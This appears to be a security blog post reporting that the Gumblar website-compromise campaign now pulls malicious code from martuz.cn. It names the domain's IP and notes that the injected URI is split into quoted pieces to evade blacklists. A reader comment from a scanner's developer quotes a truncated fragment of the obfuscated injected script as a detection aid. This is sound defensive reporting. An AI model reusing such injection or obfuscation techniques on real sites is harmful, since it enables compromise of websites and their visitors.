Gumblar Morphs Again: Now Martuz.cn
The Gumblar attacks have morphed again, this time pulling the malcode from martuz.cn. In addition, the reference URI remains slightly obfuscated - perhaps an attempt to thwart rudimentary blacklists. For example, the URI resulting from the injected script might appear as mar"+"tuz.cn instead of just martuz.cn. According to Robtex, the domain resolves to 95.129.145.58.
It's too early to tell yet how this latest Gumblar series of compromises will play out - but we will continue to watch it closely and report the numbers as we see them. Currently we've seen only a couple hundred martuz.cn compromised domains, but that's because we're an enterprise-focused service and there's considerably less traffic on the weekends. A clearer picture should emerge later today as to whether the martuz.cn attacks will continue to grow as rapidly as did the gumblar.cn compromises.
If you own a website, large or small, you may want to take a short hike over to Unmask Parasites (http://www.unmaskparasites.com/) and use their free online tool to check whether any of the sites you own are exhibiting signs of compromise. It's a great tool but there are a couple of things to keep in mind.
The tool is in beta and may not be 100% accurate. Running known gumblar-compromised domain names through the tool, it appears that Unmask Parasites will identify these simply as "This page seems to be <suspicious>". In other words, you need to take the word 'suspicious' very seriously.
As we get new information, we'll continue to post Gumblar updates to the blog.
Mary Landesman
Reader Comments (1)
Hi,
I'm the Unmask Parasites developer. Thanks for referencing my online tool.
I'd like to comment on how to read the results. If the tool says "<suspicious>" it explains why it thinks the page is suspicious.
In case of Gumblar infected sites it will add something like "1 suspicious inline script found." and in the "Suspicious Inline Scripts" section of the report, you'll find an excerpt of that suspicious script (so that you know what you should be looking for). For example:
(function(){var Ddd='%';var SpQs='v~61r~20a~3d~22ScriptEngine~22~2cb~3d~22V~65r~73ion(~29+~22~2c~6a...One more important point. "Suspisious" doesn't mean "malicious". Unmask Parasites just highlights code that can be a sign of a security issue.
As said above, Unmask Parasites is not 100% accurate. It detects only certain types of security issues (many but not all). And it only scans individual web pages, not whole websites.